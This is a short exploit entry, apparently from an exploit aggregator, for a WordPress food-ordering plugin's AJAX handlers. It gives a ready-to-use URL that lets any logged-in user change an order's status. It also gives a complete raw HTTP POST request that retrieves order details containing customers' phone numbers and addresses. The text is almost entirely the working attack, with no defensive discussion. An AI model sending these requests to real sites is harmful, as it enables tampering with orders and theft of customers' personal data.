Share
## https://sploitus.com/exploit?id=WPEX-ID:441E97EA-3127-4813-82DE-F384D2E66629
Change the order status (as any authenticated user): https://example.com/wp-admin/admin-ajax.php?payment_id=854&status=accepted&action=rpress_update_order_status

Show Order Details (Response will have PII, such as phone number, address):

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 45
Connection: close
Cookie: [any authenticated user]

action=rpress_show_order_details&order_id=854